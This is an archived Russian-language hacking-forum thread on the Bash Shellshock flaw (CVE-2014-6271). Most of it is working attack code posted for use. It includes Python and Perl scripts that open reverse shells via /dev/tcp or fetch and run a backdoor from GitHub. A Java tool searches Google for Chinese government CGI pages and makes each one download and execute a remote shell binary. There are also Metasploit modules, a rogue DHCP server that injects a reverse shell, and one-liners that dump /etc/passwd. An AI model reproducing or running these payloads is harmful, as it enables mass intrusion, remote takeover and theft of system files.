PDA

Просмотр полной версии : CVE: 2014-6271 Bash Specially-crafted Environment Variables Code Injection Vulnerabil


dikiy
24.09.2014, 19:11
Принци понятен: мы можем создать переменную с функцией, добавить ее в окружение вместе с командами.
Но какой с этого прок, bash ведь не суидник. Какие векторы использования данной уязвимости?

mr.The
24.09.2014, 20:41
Насколько я понял - суть в том, что можно удаленно установить, например, глобальную переменную окружения TERM как функцию и написать там хоть бекконнект шелл и как только кто-то на самом деле откроет bash - функция выполнится.

http://www.csoonline.com/article/2687265/application-security/remote-exploit-in-bash-cve-2014-6271.html

dikiy
25.09.2014, 00:08
Насколько я понял - суть в том, что можно удаленно установить, например, глобальную переменную окружения TERM как функцию и написать там хоть бекконнект шелл и как только кто-то на самом деле откроет bash - функция выполнится.

http://www.csoonline.com/article/2687265/application-security/remote-exploit-in-bash-cve-2014-6271.html

Да, но переменная будет доступна только в томже процессе баша, либо в дочернем.

dikiy
25.09.2014, 01:27
Нашел пример
#
#CVE-2014-6271 cgi-bin reverse shell
#

import httplib,urllib,sys

if (len(sys.argv)<4):
print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
exit(0)

conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]

headers = {"Content-type": "application/x-www-form-urlencoded",
"test":reverse_shell }
conn.request("GET",sys.argv[2],headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data

SynQ
25.09.2014, 11:15
Насколько понимаю embedded железки под ударом (но не простые модемы - там busybox).

Ubuntu/Debian с dash – неуязвимы.

tex
25.09.2014, 11:52
[tex@localhost cgi-bin]$ cat test_1.cgi
#!/usr/bin/bash
echo -e "Content-type: text/html\n\nhello world";

[tex@localhost cgi-bin]$ curl http://localhost/cgi-bin/test_1.cgi -A '() { x;};echo;/bin/id'
uid=48(apache) gid=48(apache) groups=48(apache)
[tex@localhost cgi-bin]$ cat test_2.cgi
#!/usr/bin/perl

print "Content-type: text/html\n\n";
system "bash -c echo hello world";
[tex@localhost cgi-bin]$ curl http://localhost/cgi-bin/test_2.cgi -A '() { x;};echo;/bin/id'

uid=48(apache) gid=48(apache) groups=48(apache)

круто

Pashkela
27.09.2014, 12:35
Работает и на бубунте (старой правда):


Linux an 2.6.38-16-generic #67-Ubuntu SMP Thu Sep 6 18:00:43 UTC 2012 i686 athlon i386 GNU/Linux
GNU bash, версия 4.2.8(1)-release-(i686-pc-linux-gnu)



<?php
/*
Title: Bash Specially-crafted Environment Variables Code Injection Vulnerability
CVE: 2014-6271
Vendor Homepage: https://www.gnu.org/software/bash/
Author: Prakhar Prasad && Subho Halder
Author Homepage: https://prakharprasad.com && https://appknox.com
Date: September 25th 2014
Tested on: Mac OS X 10.9.4/10.9.5 with Apache/2.2.26
GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13)
Usage: php bash.php -u http://<hostname>/cgi-bin/<cgi> -c cmd
Eg. php bash.php -u http://localhost/cgi-bin/hello -c "wget http://appknox.com -O /tmp/shit"
Reference: https://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/

Test CGI Code - test.sh :
#!/bin/bash
echo "Content-type: text/html"
echo ""
echo "Bash-is-Vulnerable"
*/
error_reporting(0);
if(!defined('STDIN')) die("Please run it through command-line!\n");
$x = getopt("u:c:");
if(!isset($x['u']) || !isset($x['c']))
{
die("Usage: ".$_SERVER['PHP_SELF']." -u URL -c cmd\n");

}
$url = $x['u'];
$cmd = $x['c'];

$context = stream_context_create(
array(
'http' => array(
'method' => 'GET',
'header' => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"'
)
)
);
if(!file_get_contents($url, false, $context) && strpos($http_response_header[0],"500") > 0){
die("Command '$cmd' done\n");
}else{
die("Connection Error\n");
}
?>



$ php s.php -u http://localhost/test.sh -c "ls -la >test1"


Модераторы, переименуйте тему плиз в нормальную

CVE: 2014-6271 Bash Specially-crafted Environment Variables Code Injection Vulnerability

SynQ
27.09.2014, 14:25
Pashkela
Работает, т.к. в скрипте "!/bin/bash", но не работает с /bin/sh.

tex
27.09.2014, 21:00
Работает везде где bash используется, вне зависимости от платформы.
плюс еще, как на хабре написали- если в системе дефолтный bash а не sh, то достаточно просто обращения к командной оболочке.


интереснее что там с dhclient за фигня, не видел кто подробности?

pres
28.09.2014, 01:23
Этот баг значит только в тех скриптах, которые начинаются с "#!/bin/bash" ?

dikiy
28.09.2014, 02:28
Этот баг значит только в тех скриптах, которые начинаются с "#!/bin/bash" ?

В любых, где bash вызывается

chevr0sky
28.09.2014, 06:46
import java.io.IOException;
import java.net.URLDecoder;
import java.util.Queue;
import java.util.concurrent.LinkedBlockingQueue;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

import org.jsoup.Connection;
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import org.jsoup.select.Elements;


public class Test extends Thread{

Queue<String> strQeueu = new LinkedBlockingQueue<String>();

public Test(Queue<String> strQeueu){
this.strQeueu = strQeueu;
}

public static String getResponse(String url) throws IOException{
try {
System.out.println("请求:"+url);
Connection.Response response = Jsoup.connect(url)
.userAgent("Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0")
.referrer("http://www.google.com.hk/")
.userAgent("() { :; }; /usr/bin/wget xxx.xxx.xxx.xxx/shell1 -O /tmp/shell1 | /bin/chmod 777 /tmp/shell1 | /tmp/shell1")
.ignoreHttpErrors(true)
.timeout(3000)
.execute();
return response.body();
} catch (IOException e) {
throw e;
}
}

public void run(){
while(true){
String str = strQeueu.poll();
if(str == null){
return ;
}
try {
getResponse(str);
} catch (Exception e) {
System.err.println(e);
}
}
}

public static void main(String[] args) throws IOException {
Document doc = Jsoup.connect("https://www.google.ws/search?q=filetype:cgi+inurl:cgi-bin+site:gov.cn&num=100&newwindow=1&biw=1440&bih=710&ei=qpojVIrRIJPX8gWU_4GwDg&start=300&sa=N").userAgent("Googlebot/2.1 (+http://www.googlebot.com/bot.html)").timeout(5000).get();
Elements element = doc.getElementsByTag("h3");
Queue<String> ls = new LinkedBlockingQueue<String>();
for (Element e : element) {
Matcher m= Pattern.compile("/url\\?q=(.*)&sa").matcher(e.getElementsByTag("a").get(0).attr("href"));
if(m.find()){
String url = URLDecoder.decode(m.group(1),"UTF-8");
if(url.contains("cgi")){
ls.offer(url);
}
}
}
ThreadGroup tg = new ThreadGroup("cgi");
int threadCount = ls.size() > 10 ? 10 : ls.size();
while (threadCount > 0) {
for (int i = 0; i < threadCount; i++) {
threadCount--;
new Thread(tg, new Test(ls)).start();
}
while (true) {
if (tg.activeCount() == 0) {
break;
}
}
}
}

}



#coding:utf-8
import urllib,httplib
import sys,re,urlparse

def bash_exp(url):
urlsp=urlparse.urlparse(url)
hostname=urlsp.netloc
urlpath=urlsp.path
conn=httplib.HTTPConnection(hostname)
headers={"User-Agent":"() { :;}; echo `/bin/cat /etc/passwd`"}
conn.request("GET",urlpath,headers=headers)
res=conn.getresponse()
res=res.getheaders()
for passwdstr in res:
print passwdstr[0]+':'+passwdstr[1]


if __name__=='__main__':

#带http
if len(sys.argv)<2:
print "Usage: "+sys.argv[0]+" http://www.xxx.com/cgi-bin/index.cgi"
sys.exit()
else:
bash_exp(sys.argv[1])



https://github.com/KxCode/kbash

https://github.com/ctxis/ActiveScanPlusPlus

YuNi|[c
28.09.2014, 13:59
на Burpsuite есть модул ActiveScan++ как раз и проверяет на 2014-6271

Pashkela
29.09.2014, 22:56
интереснее что там с dhclient за фигня, не видел кто подробности?

ForceCommand is used in sshd configs to provide limited command execution capabilities for remote users. This flaw can be used to bypass that and provide arbitrary command execution. Some Git and Subversion deployments use such restricted shells. Regular use of OpenSSH is not affected because users already have shell access.

Apache server using mod_cgi or mod_cgid are affected if CGI scripts are either written in Bash, or spawn subshells. Such subshells are implicitly used by system/popen in C, by os.system/os.popen in Python, system/exec in PHP (when run in CGI mode), and open/system in Perl if a shell is used (which depends on the command string).

PHP scripts executed with mod_php are not affected even if they spawn subshells.

DHCP clients invoke shell scripts to configure the system, with values taken from a potentially malicious server. This would allow arbitrary commands to be run, typically as root, on the DHCP client machine. (I’d like to point out that it has been noted that there’s the potential for this to be exploitable in CGI web applications; and it’s also worth being aware of this new metasploit module which exploits an issue in dhclient where code injection can occur via crafted hostname response to DHCP requests, in my personal opinion this is a far wider issue in dhclient itself.

https://github.com/rapid7/metasploit-framework/pull/3891

https://github.com/rcvalle/metasploit/commit/9c11d809681aa60e027373b7e861e33795e80d5e


##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex/proto/dhcp'

class Metasploit3 < Msf::Auxiliary

include Msf::Exploit::Remote::DHCPServer

def initialize
super(
'Name' => 'DHCP Client Bash Environment Variable Code Injection',
'Description' => %q{
This module exploits a code injection in specially crafted environment
variables in Bash, specifically targeting dhclient network configuration
scripts through the HOSTNAME, DOMAINNAME, and URL DHCP options.
},
'Author' =>
[
'scriptjunkie', 'apconole[at]yahoo.com', # Original DHCP Server auxiliary module
'Stephane Chazelas', # Vulnerability discovery
'Ramon de C Valle' # This module
],
'License' => MSF_LICENSE,
'Actions' =>
[
[ 'Service' ]
],
'PassiveActions' =>
[
'Service'
],
'DefaultAction' => 'Service',
'References' => [
['CVE', '2014-6271'],
['CWE', '94'],
['URL', 'https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/'],
['URL', 'http://seclists.org/oss-sec/2014/q3/649',],
['URL', 'https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/',]
],
'DisclosureDate' => 'Sep 24 2014'
)

register_options(
[
OptString.new('SRVHOST', [ true, 'The IP of the DHCP server' ]),
OptString.new('NETMASK', [ true, 'The netmask of the local subnet' ]),
OptString.new('DHCPIPSTART', [ false, 'The first IP to give out' ]),
OptString.new('DHCPIPEND', [ false, 'The last IP to give out' ]),
OptString.new('ROUTER', [ false, 'The router IP address' ]),
OptString.new('BROADCAST', [ false, 'The broadcast address to send to' ]),
OptString.new('DNSSERVER', [ false, 'The DNS server IP address' ]),
# OptString.new('HOSTNAME', [ false, 'The optional hostname to assign' ]),
OptString.new('HOSTSTART', [ false, 'The optional host integer counter' ]),
OptString.new('FILENAME', [ false, 'The optional filename of a tftp boot server' ]),
OptString.new('CMD', [ true, 'The command to run', '/bin/nc -e /bin/sh 127.0.0.1 4444'])
], self.class)
end

def run
value = "() { :; }; PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin #{datastore['CMD']}"

# This loop is required because the current DHCP Server exits after the
# first interaction.
loop do
begin
start_service({
'HOSTNAME' => value,
'DOMAINNAME' => value,
'URL' => value
}.merge(datastore))

while dhcp.thread.alive?
select(nil, nil, nil, 2)
end

rescue Interrupt
break

ensure
stop_service
end
end
end

end


+

https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/
)


Various daemons and SUID/privileged programs may execute shell scripts with environment variable values set / influenced by the user, which would allow for arbitrary commands to be run.

Any other application which is hooked onto a shell or runs a shell script as using Bash as the interpreter. Shell scripts which do not export variables are not vulnerable to this issue, even if they process untrusted content and store it in (unexported) shell variables and open subshells.


https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/

+

https://access.redhat.com/articles/1200223

PS: мне кажется, надо поискать там, где красное, в первую очередь

ewi
29.09.2014, 23:12
В любых, где bash вызывается

А если это пхп <?php system("id"); ?> - тоже, не?

Pashkela
29.09.2014, 23:15
если cgi - то может быть. Надо проверять

Pashkela
29.09.2014, 23:50
CPANEL exploit (wtf? Need to check)


#cpanel remote exploit by iskandar
#usage: cpanelpwn.pl <target> <reverseip> <reverseport>
#pnscan -L10000 -w"GET /cgi-sys/php5 HTTP/1.0\r\n\r\n" -r "mod_ssl/2.2.24" 3.1.33.7/16 80 | grep "500 Internal"
use IO::Socket;
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '80',
Proto => 'tcp');
print $sock "GET /cgi-sys/php5 HTTP/1.1\r\nHost: $ARGV[0]\r\nUser-Agent: () { a;};/usr/bin/wget -O /tmp/c.pl --no-check-certificate https://github.com/tennc/webshell/raw/master/138shell/P/PHP%20Backdoor%20Connect.pl.txt\r\n\r\n";


while(<$sock>) {
print;
}

$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '80',
Proto => 'tcp');
print $sock "GET /cgi-sys/php5 HTTP/1.1\r\nHost: $ARGV[0]\r\nUser-Agent: () { a;};/usr/bin/perl /tmp/c.pl $ARGV[1] $ARGV[2]\r\n\r\n";

while(<$sock>) {
print;
}

Panic
01.10.2014, 12:07
Тем временем обнаружены новые уязвимости: CVE-2014-7186, CVE-2014-7187 и не опубликованные CVE-2014-6277, CVE-2014-6278.
https://www.linux.org.ru/news/security/10892232
https://github.com/hannob/bashcheck


bash --version
GNU bash, version 4.3.25(1)-release (x86_64-pc-linux-gnu)


-e Not vulnerable to CVE-2014-6271 (original shellshock)
-e Not vulnerable to CVE-2014-7169 (taviso bug)
-e Not vulnerable to CVE-2014-7186 (redir_stack bug)
-e Vulnerable to CVE-2014-7187 (nested loops off by one)
-e Variable function parser inactive, likely safe from unknown parser bugs

z0mbie
02.10.2014, 11:37
как эксплуатировать на OpenSSH ?

Странно что шелшок считают хуже чем heartbleed. Не думаю что оно имеет такое распространение как hb

Panic
02.10.2014, 13:28
Тут представлено много PoC: https://github.com/mubix/shellshocker-pocs.

dikiy
02.10.2014, 17:07
как эксплуатировать на OpenSSH ?


никак. вернее то, что есть это ерунда - позволяет обойти ограничения на исполнение команд. Саму авторизацию шелшоком никак не обойти, OpenSSH в этом плане не уязвим.

recfrf
03.10.2014, 04:23
Странно что шелшок считают хуже чем heartbleed. Не думаю что оно имеет такое распространение как hb
они оценивают не со стороны когда баг в паблике, а с момента его присутствия, по сравнению с хером, который всего лишь читает в общем то случайный кусок памяти, тут выполнение команд, и это уже очень давно в распоряжении анб например :D

Pashkela
03.10.2014, 22:05
CVE-2014-6271: Pure-FTPd External Authentication Bash Environment Variable Code Injection

http://www.exploit-db.com/exploits/34862/


##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::Ftp
include Msf::Exploit::CmdStager

def initialize(info = {})
super(update_info(info,
'Name' => 'Pure-FTPd External Authentication Bash Environment Variable Code Injection',
'Description' => %q(
This module exploits the code injection flaw known as shellshock which
leverages specially crafted environment variables in Bash. This exploit
specifically targets Pure-FTPd when configured to use an external
program for authentication.
),
'Author' =>
[
'Stephane Chazelas', # Vulnerability discovery
'Frank Denis', # Discovery of Pure-FTPd attack vector
'Spencer McIntyre' # Metasploit module
],
'References' =>
[
['CVE', '2014-6271'],
['OSVDB', '112004'],
['EDB', '34765'],
['URL', 'https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc']
],
'Payload' =>
{
'DisableNops' => true,
'Space' => 2048
},
'Targets' =>
[
[ 'Linux x86',
{
'Platform' => 'linux',
'Arch' => ARCH_X86,
'CmdStagerFlavor' => :printf
}
],
[ 'Linux x86_64',
{
'Platform' => 'linux',
'Arch' => ARCH_X86_64,
'CmdStagerFlavor' => :printf
}
]
],
'DefaultOptions' =>
{
'PrependFork' => true
},
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 24 2014'))
register_options(
[
Opt::RPORT(21),
OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin'])
], self.class)
deregister_options('FTPUSER', 'FTPPASS')
end

def check
# this check method tries to use the vulnerability to bypass the login
username = rand_text_alphanumeric(rand(20) + 1)
random_id = (rand(100) + 1)
command = "echo auth_ok:1; echo uid:#{random_id}; echo gid:#{random_id}; echo dir:/tmp; echo end"
if send_command(username, command) =~ /^2\d\d ok./i
return CheckCode::Safe if banner !~ /pure-ftpd/i
disconnect

command = "echo auth_ok:0; echo end"
if send_command(username, command) =~ /^5\d\d login authentication failed/i
return CheckCode::Vulnerable
end
end
disconnect

CheckCode::Safe
end

def execute_command(cmd, _opts)
cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
username = rand_text_alphanumeric(rand(20) + 1)
send_command(username, cmd)
end

def exploit
# Cannot use generic/shell_reverse_tcp inside an elf
# Checking before proceeds
if generate_payload_exe.blank?
fail_with(Failure::BadConfig, "#{peer} - Failed to store payload inside executable, please select a native payload")
end

execute_cmdstager(linemax: 500)
handler
end

def send_command(username, cmd)
cmd = "() { :;}; #{datastore['RPATH']}/sh -c \"#{cmd}\""
connect
send_user(username)
password_result = send_pass(cmd)
disconnect
password_result
end
end


================================================== ================================================

CVE-2014-6277: GNU bash 4.3.11 Environment Variable dhclient Exploit

http://www.exploit-db.com/exploits/34860/


#!/usr/bin/python
# Exploit Title: dhclient shellshocker
# Google Dork: n/a
# Date: 10/1/14
# Exploit Author: @0x00string
# Vendor Homepage: gnu.org
# Software Link: http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz
# Version: 4.3.11
# Tested on: Ubuntu 14.04.1
# CVE : CVE-2014-6277,CVE-2014-6278,CVE-2014-7169,CVE-2014-7186,CVE-2014-7187
# ______ ______ ______ _
# / __ | / __ |/ __ | _ (_)
#| | //| |_ _| | //| | | //| | ___| |_ ____ _ ____ ____ ___
#| |// | ( \ / ) |// | | |// | |/___) _) / ___) | _ \ / _ |/___)
#| /__| |) X (| /__| | /__| |___ | |__| | | | | | ( ( | |___ |
# \_____/(_/ \_)\_____/ \_____/(___/ \___)_| |_|_| |_|\_|| (___/
# (_____|
# _ _ _ _
# | | | | (_) _
# _ | | | _ ____| |_ ____ ____ | |_
# / || | || \ / ___) | |/ _ ) _ \| _)
#( (_| | | | ( (___| | ( (/ /| | | | |__
# \____|_| |_|\____)_|_|\____)_| |_|\___)
#
# _ _ _ _ _
# | | | | | | | | |
# ___| | _ ____| | | ___| | _ ___ ____| | _ ____ ____
# /___) || \ / _ ) | |/___) || \ / _ \ / ___) | / ) _ )/ ___)
#|___ | | | ( (/ /| | |___ | | | | |_| ( (___| |< ( (/ /| |
#(___/|_| |_|\____)_|_(___/|_| |_|\___/ \____)_| \_)____)_|

# this buddy listens for clients performing a DISCOVER, a later version will exploit periodic REQUESTs, which can sometimes be prompted by causing IP conflicts
# once a broadcast DISCOVER packet has been detected, the XID, MAC and requested IP are pulled from the pack and a corresponding OFFER and ACK are generated and pushed out
# The client is expected to reject the offer in preference of their known DHCP server, but will still process the packet, triggering the vulnerability.
# can use option 114, 56 or 61, though is hardcoded to use 114 as this is merely a quick and dirty example.

import socket, struct
def HexToByte( hexStr ):
b = []
h = ''.join( h.split(" ") )
for i in range(0, len(h), 2):
b.append( chr( int (h[i:i+2], 16 ) ) )
return ''.join( b )

rport = 68
lport = 67

bsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

bsock.bind(("<broadcast>", lport))

while True:

OP = "72" # 56, Message - RFC 1533,2132. 61, Client-identifier - RFC 1533,2132,4361 or 114, URL - RFC 3679 are currently known to work, here we use 114
URL = "() { :;}; bash -i >& /dev/tcp/10.0.0.1/1337 0>&1".encode("hex")
URLLEN = chr(len(URL) / 2).encode("hex")
END = "03040a000001ff"
broadcast_get, (bcrhost, rport) = bsock.recvfrom(2048)
hexip = broadcast_get[245:249]
rhost = str(ord(hexip[0])) + "." + str(ord(hexip[1])) + "." + str(ord(hexip[2])) + "." + str(ord(hexip[3]))
XID = broadcast_get[4:8].encode("hex")
chaddr = broadcast_get[29:34].encode("hex")
print "[+]\tgot broadcast with XID " + XID + " requesting IP " + rhost + "\n"
OFFER = "02010600" + XID + "00000000000000000a0000430a0000010000000000" + chaddr + "00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00006382536335010236040a000001330400000e103a040000 07083b0400000c4e0104ffffff001c040a0000ff06040a0000 010f034c4f4c0c076578616d706c65" + OP + URLLEN + URL + END
OFFER_BYTES = HexToByte(OFFER)
ACK = "02010600" + XID + "00000000000000000a0000430a0000010000000000" + chaddr + "00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00006382536335010536040a000001330400000e103a040000 07083b0400000c4e0104ffffff001c040a0000ff06040a0000 010f034c4f4c0c076578616d706c65" + OP + URLLEN + URL + END
ACK_BYTES = HexToByte(ACK)
print "[+]\tsending evil offer\n"
sock.sendto(OFFER_BYTES, (rhost, rport))
broadcast_get2 = bsock.recvfrom(2048)
print "[+]\tassuming request was received, sending ACK\n"
sock.sendto(ACK_BYTES, (rhost, rport))



ув. модераторы, перенесите тему плз в более достойное место

"Сервисы, БД, Серверы/Network services, Databases, Servers"

вообще не помогает искать багу в поиске

Pashkela
03.10.2014, 22:25
Еще вариант:

test.sh:


#!/bin/bash
echo "Content-type: text/plain"
echo "Hi"


wget -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" http://site/cgi-bin/test.sh

Pashkela
03.10.2014, 22:45
в бубунте вот такой скрипт тоже будет уязвим:


#!/bin/sh
echo "Content-type: text/plain"
echo
echo
echo "Hi"
bash -c id


wget -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /var/www/index.php" http://127.0.0.1/test.sh

В общем любой явный или потом, в скрипте, вызов баша == RCE, если есть доступ извне

gm7
04.10.2014, 05:11
В блоге http://blog.sucuri.net/2014/09/bash-vulnerability-shell-shock-thousands-of-cpanel-sites-are-high-risk.html указываются скрипты CPanel подверженные уязвимости. Там же вскользь упоминается Plesk но я бы сказал в общих чертах. Хочу поставить демо версию Plesk'a и попробовать разобраться что и как там крутиться в контексте данной уязвимости.

dikiy
06.10.2014, 05:11
В блоге http://blog.sucuri.net/2014/09/bash-vulnerability-shell-shock-thousands-of-cpanel-sites-are-high-risk.html указываются скрипты CPanel подверженные уязвимости. Там же вскользь упоминается Plesk но я бы сказал в общих чертах. Хочу поставить демо версию Plesk'a и попробовать разобраться что и как там крутиться в контексте данной уязвимости.

я в плеске ничего не нашел. удачи